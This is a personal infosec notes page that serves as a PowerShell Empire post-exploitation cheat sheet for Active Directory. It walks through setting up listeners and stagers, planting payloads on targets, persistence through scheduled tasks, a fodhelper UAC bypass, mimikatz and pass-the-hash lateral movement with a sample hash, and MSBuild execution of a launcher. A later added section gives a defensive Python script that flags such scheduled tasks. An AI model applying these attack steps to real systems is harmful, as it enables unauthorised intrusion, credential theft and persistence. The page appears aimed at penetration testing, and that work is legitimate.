akde/infosec

Information security is ultimately about managing risk


Mainly post-exploitation for AD environments. (Download — also included in Kali sources)

Quick usage for privilege escalation

  1. Create a listener. 
    1. listeners
    2. uselistener http
    3. set Host $localIp
    4. set Port 8080
    5. execute
    6. back
  2. Create a payload. 
    1. usestager windows/launcher_bat (or _vbs, _xml, …)
    2. set Listener http
    3. execute
  3. Copy the created payload to the target.
  4. (Let) execute it on the target.
  5. Rename the listener. 
    1. listeners
    2. interact $listenername
    3. rename $bettername
    4. back
  6. Start a background task on the target for persistence. 
    1. usemodule powershell/persistence/userland/schtasks
    2. set Agent $agentname
    3. set Listener http
    4. set IdleTime 3
    5. run
    6. back
  7. Now start to work… 
    1. Start with usemodule privesc/powerup/allchecks

General usage

Metasploit syntax / PSE syntax

  • use multi/handler / listeners & uselistener <TAB> & uselistener http
  • run / execute
  • sessions / agents
  • use / usemodule
  • rename CWS… newname
  • sessions -i $id / interact $id
    • download
    • upload
    • mimikatz
    • shell sysinfo
    • ps
    • migrate $pid / psinject $listener $pid (ex. psinject http $pid)

Note: After usemodule don’t forget to go “back” and to “interact” with the agent to see job results!

Commands with an asterisk require a high-integrity Empire Agent. To upgrade one which is currently an Administrator, use powershell/privesc/bypassuac_fodhelper before running a command marked with an asterisk.

Lateral movement

Use one of the modules in powershell/lateral_movement.

(Empire: powershell/lateral_movement/invoke_smbexec) > set ComputerName JEFF
(Empire: powershell/lateral_movement/invoke_smbexec) > set Listener http
(Empire: powershell/lateral_movement/invoke_smbexec) > set Username nicky
(Empire: powershell/lateral_movement/invoke_smbexec) > set Hash b40c7060e1bf68227131564a1bf33d48
(Empire: powershell/lateral_movement/invoke_smbexec) > set Domain corp.com
(Empire: powershell/lateral_movement/invoke_smbexec) > execute

Switching to Metasploit

Create a meterpreter payload, upload it in Empire and execute it with shell C:\…\payload.exe.

Other way around: Create a listener in Empire and upload it in a meterpreter session.

Upgrading a normal shell

  1. listeners
  2. uselistener http
  3. set Host //$localIp
  4. execute
  5. usestager windows/launcher_xml
  6. set Listener http
  7. execute
  8. Upload the generated launcher.xml file to the victim
  9. Execute it on the victim as follows:
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe launcher.xml

Persistence

If you are using the powershell/persistence/userland/schtasks module to achieve persistence, try to use the attribute IdleTime. This creates a new agent every n minutes.
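From the defender's side, the scheduled task that this kind of persistence leaves behind is what a host audit looks for. The following Python script is an added example, not part of the original page: it parses the CSV output of `schtasks /query /v /fo csv` and flags tasks whose action is a hidden or encoded PowerShell launcher or that fire on an idle trigger (the IdleTime attribute above). The sample rows are constructed, and the assumption that the persistence task's action runs powershell.exe with such switches follows from the module name, not from anything the page states.

```python
import csv
import io

# Constructed sample of `schtasks /query /v /fo csv` output, trimmed to the
# columns this check reads. Hosts, task names and command lines are made up.
SAMPLE_CSV = r'''"HostName","TaskName","Author","Task To Run","Schedule Type","Idle Time","Run As User"
"WS01","\Microsoft\Windows\Defrag\ScheduledDefrag","Microsoft","%windir%\system32\defrag.exe -c -h -o -$","Weekly","Disabled","SYSTEM"
"WS01","\Updater","WS01\nicky","powershell.exe -NoP -W Hidden -Enc SQBFAFgA...","On idle","3","WS01\nicky"
"WS01","\Backup","WS01\nicky","powershell.exe -File C:\Tools\backup.ps1","Daily","Disabled","WS01\nicky"
'''

# Switches typical of a one-liner stager rather than an administrative script.
ENCODED_FLAGS = ("-enc", "-encodedcommand", "-e ", "-ec ")
HIDDEN_FLAGS = ("-w hidden", "-windowstyle hidden", "-nop", "-noprofile")


def audit_tasks(csv_text):
    """Return [(task name, [reasons])] for tasks whose action runs PowerShell
    with stager-like switches or on an idle trigger. Legitimate PowerShell
    tasks (plain -File, no idle trigger) are not reported."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        action = row.get("Task To Run", "").lower()
        if "powershell" not in action:
            continue
        reasons = []
        if any(flag in action for flag in ENCODED_FLAGS):
            reasons.append("encoded command")
        if any(flag in action for flag in HIDDEN_FLAGS):
            reasons.append("hidden window / no profile")
        # schtasks prints "Disabled" here unless the task has an idle trigger.
        idle = row.get("Idle Time", "Disabled")
        if idle != "Disabled":
            reasons.append("idle trigger (%s min)" % idle)
        if reasons:
            findings.append((row["TaskName"], reasons))
    return findings


if __name__ == "__main__":
    for name, reasons in audit_tasks(SAMPLE_CSV):
        print("%-12s %s" % (name, "; ".join(reasons)))
```

On a live host, pipe the real `schtasks /query /v /fo csv` output into `audit_tasks` instead of the constructed sample.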

About

Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.

Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.
